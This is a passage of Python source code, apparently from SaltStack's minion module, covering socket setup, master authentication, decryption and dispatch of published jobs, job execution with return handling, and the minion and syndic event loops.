'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def _gen_minions(self):
'''
Set up and tune in the minion options
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
return False
minions = []
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
try:
minions.append(Minion(s_opts, 5, False))
except SaltClientError:
minions.append(s_opts)
return minions
def minions(self):
'''
Return a list of minion generators bound to the tune_in method
'''
ret = {}
minions = self._gen_minions()
for minion in minions:
if isinstance(minion, dict):
ret[minion['master']] = minion
else:
ret[minion.opts['master']] = {
'minion': minion,
'generator': minion.tune_in_no_block()}
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
module_refresh = False
pillar_refresh = False
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
last = time.time()
auth_wait = self.opts['acceptance_wait_time']
max_wait = auth_wait * 6
while True:
for minion in minions.values():
if isinstance(minion, dict):
continue
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
while True:
package = self.epull_sock.recv(zmq.NOBLOCK)
if package.startswith('module_refresh'):
module_refresh = True
elif package.startswith('pillar_refresh'):
pillar_refresh = True
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
pass
# get commands from each master
for master, minion in minions.items():
if 'generator' not in minion:
if time.time() - auth_wait > last:
last = time.time()
if auth_wait < max_wait:
auth_wait += auth_wait
try:
if not isinstance(minion, dict):
minions[master] = {'minion': minion}
t_minion = Minion(minion, 5, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
auth_wait = self.opts['acceptance_wait_time']
except SaltClientError:
continue
else:
continue
if module_refresh:
minion['minion'].module_refresh()
if pillar_refresh:
minion['minion'].pillar_refresh()
minion['generator'].next()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True):
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
# Late setup the of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {0}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts)
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
else:
return
sreq = salt.payload.SREQ(self.opts['master_uri'])
try:
result = sreq.send('aes', self.crypticle.dumps(load))
try:
data = self.crypticle.loads(result)
except AuthenticationError:
log.info("AES key changed, re-authenticating")
# We can't decode the master's response to our event,
# so we will need to re-authenticate.
self.authenticate()
except Exception:
log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, int(self.opts['random_reauth_delay']))
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None or not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, list):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
trb = traceback.format_exc()
aspec = salt.utils.get_function_argspec(
minion_instance.functions[data['fun']]
)
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info. Possibly a missing '
'arguments issue: {2}').format(function_name,
exc,
aspec)
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
sreq = salt.payload.SREQ(self.opts['master_uri'])
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in ret.items():
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = sreq.send('aes', self.crypticle.dumps(load))
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider incresing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
if isinstance(ret_val, string_types) and not ret_val:
# The master AES key has changed, reauth
self.authenticate()
ret_val = sreq.send('aes', self.crypticle.dumps(load))
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if not 'schedule' in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
while True:
creds = auth.sign_in(timeout, safe)
if creds != 'retry':
log.info('Authentication with master successful!')
break
log.info('Waiting for minion key to be accepted by the master.')
if acceptance_wait_time:
log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self):
'''
Refresh the functions and returners.
'''
self.functions, self.returners = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
time.sleep(.5)
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
log.debug('Handling event {0!r}'.format(package))
try:
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh()
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leeks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to recieve on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
time.sleep(.5)
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts):
self._syndic_interface = opts.get('interface')
self._syndic = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'to' not in data or 'arg' not in data:
return
data['to'] = int(data['to']) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'])
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self.context = zmq.Context()
# Start with the publish socket
# Share the poller with the event object
self.poller = self.local.event.poller
self.socket = self.context.socket(zmq.SUB)
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
